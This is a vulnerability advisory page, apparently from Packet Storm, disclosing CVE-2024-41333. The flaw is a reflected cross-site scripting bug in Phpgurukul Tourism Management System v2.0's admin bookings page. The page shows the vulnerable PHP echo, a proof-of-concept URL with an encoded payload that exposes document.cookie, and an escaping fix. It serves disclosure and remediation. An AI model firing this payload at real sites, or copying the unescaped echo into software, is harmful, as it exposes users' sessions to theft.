Lucene search

Sampath Kumar KadajariPACKETSTORM:179891

HistoryAug 02, 2024 - 12:00 a.m.

Tourism Management System 2.0 Cross Site Scripting

2024-08-0200:00:00

Sampath Kumar Kadajari

packetstormsecurity.com

128

cross site scripting

phpgurukul tourism

arbitrary code

user's browser

crafted payload

vulnerable code

user bookings

reflected xss

arbitrary code execution

security vulnerability

AI Score

7.4

Confidence

Low

EPSS

0.001

Percentile

22.4%

JSON

`# Exploit Title: Tourism Management System v2.0 - Cross Site Scripting (XSS)  
# Date: 13 July 2024  
# Exploit Author: Sampath kumar kadajari  
# Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/  
# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7204   
# Version: v2.0  
# CVE: CVE-2024-41333  
# Tested on: Windows, XAMPP, Apache, MySQL  
  
-------------------------------------------------------------------------------------------------------------------------------------------  
  
A reflected cross-site scripting (XSS) vulnerability in Phpgurukul Tourism Management System v2.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the uname parameter.  
  
  
  
"Vulnerable Code" – (/admin/user-bookings.php)  
  
<h2>Manage <?php echo $_GET['uname'];?>'s Bookings</h2>  
  
  
  
---> Affected Component: http://localhost/tms/admin/[email protected]&&uname=%22%3E%3Cimg%20src/onerror=prompt(document.cookie)%3E   
  
  
  
"Fix for Vulnerable Code"   
  
<h2>Manage <?php echo htmlspecialchars($_GET['uname'], ENT_QUOTES, 'UTF-8'); ?>'s Bookings</h2>  
`